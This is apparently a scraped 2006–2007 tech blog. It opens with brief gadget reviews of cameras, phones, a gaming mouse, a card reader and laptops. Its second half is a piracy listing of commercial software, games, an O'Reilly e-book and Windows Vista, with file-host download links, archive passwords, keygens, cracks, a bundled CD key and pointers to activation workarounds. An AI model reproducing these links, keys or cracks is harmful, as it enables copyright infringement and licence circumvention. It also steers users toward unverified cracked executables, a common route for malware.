The Sony Cyber-shot DSC-W70 is an excellent, very compact performing digital Camera. The 7.2 megapixel sensor, 3x Optical zoom, nice 2.5 inch LCD, and "Stamina" battery life produces good images and excellent battery life. About the size of a deck of cards, it's easily pocketable and still performs well indoors. A 1/2.5 inch Super HAD CCD has an effective resolution of 7.2 megapixels (3072x2304 pixels). You can also capture images at 3:2, 5M, 3M, 2M, 2M, VGA, and 16:9. Two quality settings (Fine and Standard) vary the JPEG compression rates. A small optical viewfinder is also available if you're in a pinch and can't see the LCD (or are saving battery juice). With the Sony W70, you can shoot in full Auto, Program Auto, Twilight, Twilight Portrait, Soft Snap, Landscape, Beach, Snow, High Sensitivity, and Movie modes. The W70 features a 5 point auto focus (or center auto focus). You can focus on subjects as close as 19.7 inches in Normal mode and 0.72 inches in Macro mode. The W70 has 58MB of internal memory and an additional slot that accepts Memory Stick Duo or Memory Stick Pro Duo memory. The formats used by the w70 are JPEG for still images and MPEG1 compliant movies (with monaural sound). A "multiconnector" plugs into the camera with USB (2.0) jacks and AV jacks on the other end of the cable. An additional jack works with the optional AC adapter to provide power for the camera. All in all it is an excellent buy when it comes to getting quality pictures and great battery life. The camera is available for prices close to $300.

The Nokia N93


The Nokia N93 is Nokia´s new camera phone flagship and the ultimate mobile device for spontaneous video recording. Offering uncompromised digital camcorder, telephony and rich Internet communication functionalities. The Nokia N93 features a 3.2 megapixel camera with Carl Zeiss optics, DVD-like video capture and 3x optical zoom. You can connect the Nokia N93 directly to your TV for a widescreen movie experience or upload your images and video to online albums or blogs. Moreover, you can create high-quality home movies and burn them to DVD with the included Adobe Premiere Elements 2.0 software. UMTS and Wi-Fi 802.11g show that this phone is not bad, but I think it has too slow processor to handle skype properly and generally only QVGA resolution for such a phone, seems not enough. The N93 features large internal memory of up to 50 MB, which can be further expanded with a hot swap miniSD card of up to 2 GB, allowing users to capture up to 90 minutes of DVD-like quality video or close to 2500 pictures. The N93 is expected to be available from July 2006, in three colours: silver grey/deep plum, frost white/metallic red and frost white/mocha brown.

Sandio's Game O' 3D gaming mouse


Ease of Mouse Movement is a lookout for any Serious gamers. Sandio is all set to give gamers an edge with the Game O' 3D gaming mouse. Any product that promises to transfer to a mouse the movement commands that were formerly restricted to the keyboard is bound to draw some interest. Sandio Technology is showing off one such mouse, the Game O', at E3 this year, calling it "the first and the only six degrees-of-freedom 3D mouse in the IT industry." The 2000 dpi laser mouse seems to allow players to move in around in 3D space by translating mouse motions into 3D in-game movement, as opposed to just aiming a weapon's crosshair's, when the button above the scroll wheel is depressed. 3D movement is actually accomplished by a joypad on the left side of the mouse that's controlled with your thumb. Sandio will be releasing the Game O' "soon," for the not-unreasonable price of $80.

MIO-A701 Smartphone


The MIO-A701 Smartphone ships with a lot of goodies - USB cable, car charger, mains charger, dashboard mounting kit, windscreen mounting kit, software CDs, stereo headphones, a leather carry case, a spare stylus, and a screen protector. The A701 uses Microsoft's ActiveSync to allow the transfer of files, emails, contacts, MP3s, videos, etc., and has to be installed on your PC. The 240x320 pixel QVGA (Quarter VGA) screen, is clear and bright. The back light settings are very easy to manage. The Mio A701 doesn't have a keypad, and instead relies on a more PDA-like interface to interact with the user. This is to be expected as the A701 runs on the latest version of Windows for mobile devices, Windows Mobile 5. You can choose to select the individual letters using the stylus and virtual keyboard on the screen, you can use the Palm-like graffiti method of data entry and draw each letter individually, and there is a third method - the transcriber which deciphers ones handwriting and convert it to a text message! With all these cool new features and very light-weight body The MIO-A701 is an excellent buy.

USB Geek Q-Reader


Meet the ultimate card reader available in the market, USB Geek Q-Reader, with it's six individual sockets, including one each for the latest formats MMC Micro and T-flash. The Q-Reader boasts the ability to read a total of 31 different memory card formats. Available in blue, white or black plastic and measuring approximately 4" long x 2.5" wide x 0.75" thick and weighing just 2.2 ounces, this portable adapter can be easily tucked into an empty spot in any gear bag. This card reader boasts USB 2.0 transfer rates of up to 480 Mbps. There is also a mini-USB connection is on the bottom of the device.Cards supported include: SM , SMC, xD, SD, mini SD, SD-Ultra, SDC Card MS Slot, MMC, MMC II, HS-MMC, RS-MMC, MS, MS Duo, MS Pro, MS Pro Duo, MS MG, MS MG Pro, MS MG Duo, MS MG Pro Duo, CF-I, CF-II, CF Ultra II, Micro Drive, 1.8inch HDD, MD Card, MS Rom, SMC Card, T-Flash, MMC Micro, MMC4.0, RS-MMC4.0.

Sony Ericsson M600


Meet Sony Ericssons contender to gain a foothold against Nokias Latest N-Series phone - The Sony Ericsson M600. The dual-mode thumbster measures only 15-milimeters and is designed for UMTS and tri-band GSM/GPRS networks. Each key on the QWERTY keyboard handles two letters, one is chosen depending on the angle that you tap it. The display is a 2.6-inch 262k with 320 x 240 resolution. USB 2.0 support allows for fast transfers of MP3, AAC and video at 30 FPS. 80MB of onboard memory for storing your emails, attachments and multimedia files, Sony Ericsson also adds a 64MB Memory Stick Micro to the bundle, their latest ultra-small memory format for compact mobile devices. The Sony Ericsson M600 is available in Granite Black and Crystal White beginning Q2 2006 globally.

Toshiba Qosmio G35-AV650


Presenting the first-ever HD DVD-ROM integrated in a notebook, The Toshiba Qosmio G35-AV650 beautifully redefines the high-definition experience in a revolutionary 4-in-1 entertainment center. It is packed with powerful multimedia features and a multitude of worlds firsts. The Qosmio G35-AV650 lets you watch 1080p HD DVDs on the stunning 17" diagonal widescreen display. The HDMI connector with support for 1080i means you can also connect your Qosmio to HD TV's8 to enjoy your movies and games in stunning detail, in a larger format.
The Configuration details are:INTEL CORE DUO 1.83Ghz Centrino Processor,1024Mb DDR RAM, 200Gb (2x100GB) Hard Disk Drive, DVD+-ReWriter Drive (DVD Burner), 17” UXWGA TruBrite TFT Colour Screen, nVidia GeForce Go7300 256Mb Graphics Card, 56K V.92 Modem, Finger Print Reader,TV-Tuner, Remote Control, 10/100 LAN, 802.11b/g Wireless LAN, 4x USB 2.0 Port, 1x IEEE 1394 Firewire port, 1x VGA Port, 1x S-Video Connector, Windows XP Media Center Operating System.

Samsung SGH-X828


Samsung unveiled its SGH-X828 naming it the 'World's Thinnest Phone' with the thickness of the iPod Nano at a mere 6.9mm (0.27-inches), beating the current slim phone, EV-K100 by 1mm. Other than its sleekness, it is feature loaded with a 2 megapixel camera, MP3 playback, Bluetooth connectivity, 262 million colours, TV out and an internal memory of 80MB. The Price of the device has not yet been confirmed. The phone should be out in Europe by the name SGH-X820 and Russia this week, with China to follow in June.
10:29 AM
var a = 0; if(a == 0) {document.write('Add a comment');} else if(a == 1) {document.write('1 comment');}else{document.write(a+' comments');}
Add a comment

The Woodi CA-C360


Korean mp3 player company Woodi has released another cool and compact media player on the start - the Woodi CA-C360. The Woodi CA-C360 has a 1.8 inch color screen and measures only 39x54x11mm and weighs 34g. This small portable media player plays mp3, wma, mtx, asf and wav files. It features an FM tuner, voice recorder and line-in recording. The CA-C360 comes in 256MB, 512MB and 1GB storage configurations.

Ferrari Learning Laptop



This Ferrari Learning Laptop is a cute little gadget aimed at ages 5 and up. The with LED backlit trackpad and exclusive mouse design features 60 age appropriate and educationally sound content covers these key development areas by using activities and games including 10 in Spanish for second language acquisition.The kids can now play and learn essential 1st and 2nd grade skills while practicing fundamental keyboard skills. 60 Activities and games include 50 games in English and 10 games in Spanish. There are 14 Vocabulary/Grammar/Spelling games. 20 Math/Logic/and Memory games. 9 Creative arts games that incorporate music activities. 7 Computer skills utilizing Keyboard functions and tools. Help your children hold the pole position to being first in their class and enhancing their computer skills with this great learning tool. Includes a mouse, Strap carry handle and mouse pad.
1:25 PM

DSL Speed V3.9



DSL Speed is a prefessional tool that will online optimize yourDSL(e.g.,ADSL,G.lite,IDSL,SDSL)connection speed to MAX.* Auto detecting DNS ,DNS now on the top of the verify site list, no needto fill again.* Support for lan (wire and wireless)* Speed up the MTU verifying, some site in few seconds.
No Passord and Serial Included.

Privacy Shield v3.0.56


Privacy Shield erases data by using government-level removal techniques. It completely cleans your computer of any Internet or Windows habits you want to guarantee won't get discovered.
In seconds it will clear your browser history, browser cache, system cookies, typed URL list, index.dat file, temp files, recent documents, and e-mail histories.
It also will delete the full history of ACDSee, Acrobat Reader, AOL Messenger, CuteFTP, Google toolbar, ICQ, Kazaa, MSN Messenger, the MSN toolbar, Office2003, OfficeXP, PowerDVD, RealPlayer, Windows Media Player, WinRAR, WinZip, Yahoo Messenger, and Yahoo toolbar.
You even can set it to delete any files or folders you want to completely disappear
.http://www.filefactory.com/file/c8bad9
(DepositFiles.com)
http://depositfiles.com/files/1524387

WebRoot Spy Sweeper v5.5.7.48



Webroot Spy Sweeper is award-winning anti-spyware software that effectivelydetects and safely removes spyware and adware from your PC. Spy Sweeperprotects you from spyware's negative consequences, which include a slowerInternet connection, pop-up advertisement problems, reduced computerperformance, or in the worst case, the loss of private information and identitytheft.
Features:Spy Sweeper? "sweeps" your computer looking for evidence of these programs,reports its findings, and lets you decide whether to quarantine and remove theprogram or keep it running on your system. Quarantining and removing programswill disable it until you decide to delete the program completely or restore it.
Download: (Size: 13,1 MB)No Password and Crack Included.(RapidShare.com)http://rapidshare.com/files/49667005/Airapedra.rar

Secure Disk Ver. 2.1 with Patch | 1,7 Mb

Secure Disk Ver. 2.1 with Patch 1,7 MbSecure Disk provides the ultimate security standard for encryption at the physical sector level. Based on the most secure technology, AES256, this product is an outstanding data security tool. Another great feature is the support of flash media and USB hard disk drives, so that no one will be able to access your data if you lose it.
http://www.uploading.com/en/files/LNWEO80S/Secure.Disk.v.2.1.html
http://w14.easy-share.com/3585931.html

Digital Film Tools 55mm v7.5 for Adobe Photoshop



Digital Film Tools 55mm is the definitive set of digital optical filters meant to simulate popular glass camera filters, specialized lenses, optical lab processes, film grain, exacting color correction as well as natural light and photographic effects--all in a controlled digital environment with either 8 or 16 bits per channel processing.
The set of plug-ins includes:Black & White, Black Mist, Bleach Bypass, Blur, Center Spot, Chromatic Aberration, Color Compensating, Color Conversion, Color Correct, Color Grad, Color Infrared, Color Spot, Cool Mist, Cross Processing, Day for Night, Defog, Defringe, Depth of Field, Diffusion, Double Fog, Dual Grad, Edge Glow, Enhancing, Faux Film, Flashing, Fluorescent, Fog, F-Stop, GamColor Gels, Gels, Glow, Gold Reflector, Grain, Halo, Infrared, Kelvin, Lens Distortion, Light, Light Balancing, Low Contrast, Mist, Mono Tint, ND Grad, Night Vision, Old Photo, Overexpose, Ozone, Pencil, Photographic Filters, Polarizer, Printer Points, Rack Focus, Radial Exposure, ReLight, Rosco Gels, Selective Color Correct, Selective Saturation, Silver Reflector, Skin Smoother, Soft Effects, Split Field, Split Tone, Star, Streaks, Strip Grad, Sunset/Twilight, Telecine, Temperature, Three Strip, Tint, Two Strip, Ultra Contrast, Vari-Star, Vignette, Warm Black Mist, Warm Mist, Warm Soft Effects
Quote:
HomepageDownload : (32225 KB)
Pass : www.softarchive.net

ACDSee Photo Manager v9.0 Build 108 + Keygen

ACDSee Photo Manager v9.0 Build 108 + Keygen
ACDSee - the worlds #1 digital imaging software. ACDSee is a comprehensive application ideal for acquiring, organizing, viewing, enhancing and sharing your images.
With the image browser, you can find, organize, and preview images and media files on your computer, and you can efficiently acquire images from digital cameras, scanners, and other devices
.A full-featured image viewer and media player quickly generates high-quality displays of your images and media files.
You can run slide shows, play embedded audio, and display multiple page images. ACDSee supports over 50 image and multimedia file formats. Also, ACDSee includes a wide variety of image editing tools you can use to create, edit and touch-up your digital images.
ACDSee - the worlds #1 digital imaging software.
ACDSee is a comprehensive application ideal for acquiring, organizing, viewing, enhancing and sharing your images.
With the image browser, you can find, organize, and preview images and media files on your computer, and you can efficiently acquire images from digital cameras, scanners, and other devices.
A full-featured image viewer and media player quickly generates high-quality displays of your images and media files.
You can run slide shows, play embedded audio, and display multiple page images. ACDSee supports over 50 image and multimedia file formats. Also, ACDSee includes a wide variety of image editing tools you can use to create, edit and touch-up your digital images.
Download
http://files.acdsystems.com/english/installers/acdseepro.exe
KeygenACDSee.v9.0.108.Photo.Manager.Keymaker.by.Freshwap.com.rar
Password : www.freshwap.com

WindowBlinds v5.5 Enhanced Build 94x86


WindowBlinds is a program that enables Windows users to completely change the look and feel of Windows users interface.
Users customize Windows by using visual styles (skins) created for WindowBlinds
. With these skins, WindowsBlinds can change the look of Title bars, borders, Task bars, Start button, Start menu, Progress animations, Toolbar icons, Explorer Views, and virtually every other part of Windows!WindowBlinds is the only program that can customize the GUI of WindowsXP without having to alter system DLLs.
WindowBlinds has been tested to ensure it works with Windows Vista, so you know it is compatible, reliable, and more secure.
Features:
Skins virtually every aspect of the Windows GUIClean and easy configuration dialog.Tons of configuration options for usersAnimation supported on titlebars, buttons, and many other elements.Change the color of any visual style on the flyPer-application visual stylesDoesn't alter any system filesSafe, reliable way to change the look and feel of WindowsSystem Requirements:
Windows Vista (32-bit) and Windows XP/2003 (Starting with WindowBlinds 5.5)Windows 2000, ME, 98 users can use WindowBlinds Classic (v4.6).1GHz or faster processor recommended60MB free drive space256MB RAM
DOWNLOAD (15.5MB)
pass: www.softarchive.net

Harry Potter and The Order of The Phoenix Game


Third-Person, AdventurePublisher : Electronic ArtsLanguage : EnglishRelease Date : June 25, 2007Audience Rating : Everyone 10+Format : DVD-5 ISO
Download links
http://rapidshare.com/files/40365690/H4rryP0tt3r_0rder0fth3ph03n1x.part01.rar
http://rapidshare.com/files/40986091/H4rryP0tt3r_0rder0fth3ph03n1x.part38.rar
Password : freshwap.com

Adobe Photoshop CS3

Adobe® Photoshop® software, the professional image-editing standard and leader of the Photoshop digital imaging line, delivers more of what you crave.
Groundbreaking creative tools help you achieve extraordinary results. Unprecedented adaptability lets you custom-fit Photoshop to the way you work.
And with more efficient editing, processing, and file handling, there’s no slowing you down.Adobe Photoshop CS3 is the next version of Adobe Photoshop software, the professional standard in digital imaging, to be released in spring 2007. The Photoshop CS3 beta is an unfinished version of the application that we are making available to you now, to enable you to work natively on the latest hardware and operating system platforms prior to our ultimate release of the final product.
The beta is available as a Universal Binary for the Macintosh platform as well for Microsoft® Windows® XP and Windows Vista computers, with the final shipping release of Adobe Photoshop CS3 planned for spring 2007.
Download http://rapidshare.com/files/23446385/CS3_ww.thesaltinez.com.part1.rar
http://rapidshare.com/files/23449446/CS3_ww.thesaltinez.com.part2.rar
Password : www.thesaltinez.com

Vista Transformation Pack 7.0 (Direct link) + kb925902 error fixed

Vista Transformation Pack 7.0 (Direct link) + kb925902 error fixed 31.6 MB
Vista Transformation Pack will give to your Windows XP system the new and cool look of Microsoft's future operating system: Windows Vista.
The pack changes most of the system icons, skins and toolbars and also adds new enhancements to your desktop such as a dock bar or a different system tray clock
. It is free and does a great job of giving machine a look similar to Vista.It does have uninstallation options in case you decide you want to get rid of it, so there really isn’t anything to lose.
However, when you install the software it has to overwrite some system files (it modifies things like the boot screen) so Windows will prompt you stating that your system files have been changed.
It will ask whether you want to change them back or leave them, so just leave them if you want the system to function properly.
Features of "Vista Transformation Pack":
• Boot screen•
Welcome Screen / Logon Screen•
New msstyles files (visual styles)•
New desktop and file icons•
New toolbar icons•
Progress Dialogs
• Sounds scheme
• System Tray icons
• New Wallpapers
• Windows Media Player Skins
This is the most tired release I’ve ever been through. I wonder if user who get this will appreciate how hard I really went through for this.
It seems Lee is being too messy right now so I won’t hold back any longer. This release has overall improvements for features compared to previous versions and has a lot of user interface refinements for ease of use with end-user. You will find this program is amazingly easier comparing to all other shell packs
.Mirror
http://www.satzoom.com/lucifiar/vtp7.zip (Direct link)http://www.megaupload.com/?d=70Z2N0YZ (Mega link)http://rapidshare.com/files/39661335/VistaTransPack7.0_trtsoftware.rar.html (RS link)
More Desktop Toolshttp://rapidshare.com/users/XLBPVX
KB925902 error fixedhttp://www.megaupload.com/?d=SXMZGJH4
Mirrorhttp://www.divshare.com/download/1097597-4cd
password: trtsoftware

Designing Web Navigation: Optimizing the User Experience

Designing Web Navigation: Optimizing the User Experience
James Kalbach, «Designing Web Navigation: Optimizing the User Experience»O'Reilly Media, Inc. ISBN: 0596528108 June 1, 2007 456 pages CHM 29MBThoroughly rewritten for today's web environment, this bestselling book offers a fresh look at a fundamental topic of web site development: navigation design. Amid all the changes to the Web in the past decade, and all the hype about Web 2.0 and various "rich" interactive technologies, the basic problems of creating a good web navigation system remain. Designing Web Navigation demonstrates that good navigation is not about technology-it's about the ways people find information, and how you guide them.
Ideal for beginning to intermediate web designers, managers, other non-designers, and web development pros looking for another perspective, Designing Web Navigation offers basic design principles, development techniques and practical advice, with real-world examples and essential concepts seamlessly folded in.
How does your web site serve your business objectives? How does it meet a user's needs? You'll learn that navigation design touches most other aspects of web site development.
Download from RapidShare
Download from Depositfiles

Test Drive Unlimited

Test Drive Unlimited
Test Drive Unlimited is the only game that immerses you into the car and bike enthusiast lifestyle, with total freedom to race however and wherever you want within a huge, online­persistent environment. Visit the most sophisticated car dealers to purchase new vehicles or simply take them for a spin. Customize each vehicle to make it one-of-a-kind. Test Drive Unlimited challenges players online to experience the most exotic and fastest vehicles on more than 1000 miles of diverse Hawaiian roads. Gamers earn master points for driving, airtime, drifts and winning races which leads to unlocking new races and challenges.
Download links
http://rapidshare.com/files/38600440/TeDU.part01.rar
http://rapidshare.com/files/38603718/TeDU.part02.rar
http://rapidshare.com/files/38607479/TeDU.part03.rar
http://rapidshare.com/files/38610833/TeDU.part04.rar
http://rapidshare.com/files/38613766/TeDU.part05.rar
http://rapidshare.com/files/38616494/TeDU.part06.rar
http://rapidshare.com/files/38619317/TeDU.part07.rar
http://rapidshare.com/files/38622038/TeDU.part08.rar
http://rapidshare.com/files/38624600/TeDU.part09.rar
http://rapidshare.com/files/38627121/TeDU.part10.rar
http://rapidshare.com/files/38629863/TeDU.part11.rar
http://rapidshare.com/files/38632162/TeDU.part12.rar
http://rapidshare.com/files/38634432/TeDU.part13.rar
http://rapidshare.com/files/38636814/TeDU.part14.rar
http://rapidshare.com/files/38639133/TeDU.part15.rar
http://rapidshare.com/files/38641305/TeDU.part16.rar
http://rapidshare.com/files/38643619/TeDU.part17.rar
http://rapidshare.com/files/38646650/TeDU.part18.rar
http://rapidshare.com/files/38649592/TeDU.part19.rar
http://rapidshare.com/files/38652240/TeDU.part20.rar
http://rapidshare.com/files/38655306/TeDU.part21.rar
http://rapidshare.com/files/38658356/TeDU.part22.rar
http://rapidshare.com/files/38661428/TeDU.part23.rar
http://rapidshare.com/files/38664843/TeDU.part24.rar
http://rapidshare.com/files/38667849/TeDU.part25.rar
http://rapidshare.com/files/38671276/TeDU.part26.rar
http://rapidshare.com/files/38674679/TeDU.part27.rar
http://rapidshare.com/files/38678266/TeDU.part28.rar
http://rapidshare.com/files/38682025/TeDU.part29.rar
http://rapidshare.com/files/38686020/TeDU.part30.rar
http://rapidshare.com/files/38690088/TeDU.part31.rar
http://rapidshare.com/files/38694185/TeDU.part32.rar
http://rapidshare.com/files/38698057/TeDU.part33.rar
http://rapidshare.com/files/38702119/TeDU.part34.rar
http://rapidshare.com/files/38706909/TeDU.part35.rar
http://rapidshare.com/files/38711436/TeDU.part36.rar
http://rapidshare.com/files/38715539/TeDU.part37.rar
http://rapidshare.com/files/38719779/TeDU.part38.rar
http://rapidshare.com/files/38724278/TeDU.part39.rar

Password : freshwap
Crackhttp://m0010.gamecopyworld.com/games/pc_test_drive

WWE SmackDown! vs. RAW 2007

Install notes: To install the game Make a folder called WWE Raw2 Exstract to that FolderThen click the WWE VS ECW.exe File that will start the game
Download links
http://rapidshare.com/files/38525340/Wwe_Raw2_ewares.org.part01.rar http://rapidshare.com/files/38529728/Wwe_Raw2_ewares.org.part02.rar http://rapidshare.com/files/38534437/Wwe_Raw2_ewares.org.part03.rar http://rapidshare.com/files/38538126/Wwe_Raw2_ewares.org.part04.rar http://rapidshare.com/files/38542434/Wwe_Raw2_ewares.org.part05.rar http://rapidshare.com/files/38545112/Wwe_Raw2_ewares.org.part06.rar http://rapidshare.com/files/38514566/Wwe_Raw2_ewares.org.part07.rar http://rapidshare.com/files/38519351/Wwe_Raw2_ewares.org.part08.rar http://rapidshare.com/files/38520877/Wwe_Raw2_ewares.org.part09.rar

Swish SoftWares (AIO)



Quote:
PassWord For Rar :www.softarchive.net
and For AutoPlay : Eka (E)ka

M!cro0ft W!nd0ws V!sTa x64 + x32 AIO DVD


RS.com 44 x 95.7MB Rar's 4.25GB Unrared ISO image
As you all know Microsoft released its new Operating System Vista 6 months back...with quite a lot of diffrent versions..Well anyway your problems are solved, this AIO DVD has both 32bit + 64bit versions of Vista:
Windows Vista Home Basic (x86) or (x64) Windows Vista Home Basic N (x86) or (x64) Windows Vista Home Premium (x86) or (x64) Windows Vista Business (x86) or (x64) Windows Vista Business N (x86) or (x64) Windows Vista Ultimate (x86) or (x64) Windows Vista Starter (x86)his upload has includes a CD key if you cant find one of your own, an RTM Uniersal Key allowing you to choose which version of Vista you want :)OEM/Retail versions are all available on the DVD depending on the type of key you enter. You still need to activate Vista but there are many workarounds on the Net and in my Rapidshare folder (Link below)Links:
Quote:http://anonymz.com/?http://rapidshare.com/files/32639660/MS_V_st__32bit___64bit_AIO_DVD.part01.rarhttp://anonymz.com/?http://rapidshare.com/files/32643738/MS_V_st__32bit___64bit_AIO_DVD.part02.rarhttp://anonymz.com/?http://rapidshare.com/files/32647547/MS_V_st__32bit___64bit_AIO_DVD.part03.rarhttp://anonymz.com/?http://rapidshare.com/files/32651363/MS_V_st__32bit___64bit_AIO_DVD.part04.rarhttp://anonymz.com/?http://rapidshare.com/files/32654642/MS_V_st__32bit___64bit_AIO_DVD.part05.rarhttp://anonymz.com/?http://rapidshare.com/files/32657696/MS_V_st__32bit___64bit_AIO_DVD.part06.rarhttp://anonymz.com/?http://rapidshare.com/files/32660591/MS_V_st__32bit___64bit_AIO_DVD.part07.rarhttp://anonymz.com/?http://rapidshare.com/files/32663667/MS_V_st__32bit___64bit_AIO_DVD.part08.rarhttp://anonymz.com/?http://rapidshare.com/files/32666333/MS_V_st__32bit___64bit_AIO_DVD.part09.rarhttp://anonymz.com/?http://rapidshare.com/files/32669415/MS_V_st__32bit___64bit_AIO_DVD.part10.rarhttp://anonymz.com/?http://rapidshare.com/files/32672220/MS_V_st__32bit___64bit_AIO_DVD.part11.rarhttp://anonymz.com/?http://rapidshare.com/files/32675123/MS_V_st__32bit___64bit_AIO_DVD.part12.rarhttp://anonymz.com/?http://rapidshare.com/files/32678321/MS_V_st__32bit___64bit_AIO_DVD.part13.rarhttp://anonymz.com/?http://rapidshare.com/files/32681793/MS_V_st__32bit___64bit_AIO_DVD.part14.rarhttp://anonymz.com/?http://rapidshare.com/files/32685550/MS_V_st__32bit___64bit_AIO_DVD.part15.rarhttp://anonymz.com/?http://rapidshare.com/files/32689483/MS_V_st__32bit___64bit_AIO_DVD.part16.rarhttp://anonymz.com/?http://rapidshare.com/files/32693830/MS_V_st__32bit___64bit_AIO_DVD.part17.rarhttp://anonymz.com/?http://rapidshare.com/files/32698363/MS_V_st__32bit___64bit_AIO_DVD.part18.rarhttp://anonymz.com/?http://rapidshare.com/files/32702984/MS_V_st__32bit___64bit_AIO_DVD.part19.rarhttp://anonymz.com/?http://rapidshare.com/files/32707602/MS_V_st__32bit___64bit_AIO_DVD.part20.rarhttp://anonymz.com/?http://rapidshare.com/files/32712451/MS_V_st__32bit___64bit_AIO_DVD.part21.rarhttp://anonymz.com/?http://rapidshare.com/files/32717398/MS_V_st__32bit___64bit_AIO_DVD.part22.rarhttp://anonymz.com/?http://rapidshare.com/files/32722794/MS_V_st__32bit___64bit_AIO_DVD.part23.rarhttp://anonymz.com/?http://rapidshare.com/files/32840723/MS_V_st__32bit___64bit_AIO_DVD.part24.rarhttp://anonymz.com/?http://rapidshare.com/files/32844391/MS_V_st__32bit___64bit_AIO_DVD.part25.rarhttp://anonymz.com/?http://rapidshare.com/files/32847551/MS_V_st__32bit___64bit_AIO_DVD.part26.rarhttp://anonymz.com/?http://rapidshare.com/files/32850555/MS_V_st__32bit___64bit_AIO_DVD.part27.rarhttp://anonymz.com/?http://rapidshare.com/files/32853480/MS_V_st__32bit___64bit_AIO_DVD.part28.rarhttp://anonymz.com/?http://rapidshare.com/files/32856270/MS_V_st__32bit___64bit_AIO_DVD.part29.rarhttp://anonymz.com/?http://rapidshare.com/files/32756095/MS_V_st__32bit___64bit_AIO_DVD.part30.rarhttp://anonymz.com/?http://rapidshare.com/files/32762459/MS_V_st__32bit___64bit_AIO_DVD.part31.rarhttp://anonymz.com/?http://rapidshare.com/files/32769478/MS_V_st__32bit___64bit_AIO_DVD.part32.rarhttp://anonymz.com/?http://rapidshare.com/files/32776629/MS_V_st__32bit___64bit_AIO_DVD.part33.rarhttp://anonymz.com/?http://rapidshare.com/files/32782923/MS_V_st__32bit___64bit_AIO_DVD.part34.rarhttp://anonymz.com/?http://rapidshare.com/files/32789381/MS_V_st__32bit___64bit_AIO_DVD.part35.rarhttp://anonymz.com/?http://rapidshare.com/files/32795476/MS_V_st__32bit___64bit_AIO_DVD.part36.rarhttp://anonymz.com/?http://rapidshare.com/files/32801787/MS_V_st__32bit___64bit_AIO_DVD.part37.rarhttp://anonymz.com/?http://rapidshare.com/files/32807730/MS_V_st__32bit___64bit_AIO_DVD.part38.rarhttp://anonymz.com/?http://rapidshare.com/files/32813575/MS_V_st__32bit___64bit_AIO_DVD.part39.rarhttp://anonymz.com/?http://rapidshare.com/files/32819063/MS_V_st__32bit___64bit_AIO_DVD.part40.rarhttp://anonymz.com/?http://rapidshare.com/files/32824263/MS_V_st__32bit___64bit_AIO_DVD.part41.rarhttp://anonymz.com/?http://rapidshare.com/files/32829264/MS_V_st__32bit___64bit_AIO_DVD.part42.rarhttp://anonymz.com/?http://rapidshare.com/files/32833663/MS_V_st__32bit___64bit_AIO_DVD.part43.rarhttp://anonymz.com/?http://rapidshare.com/files/32836851/MS_V_st__32bit___64bit_AIO_DVD.part44.rar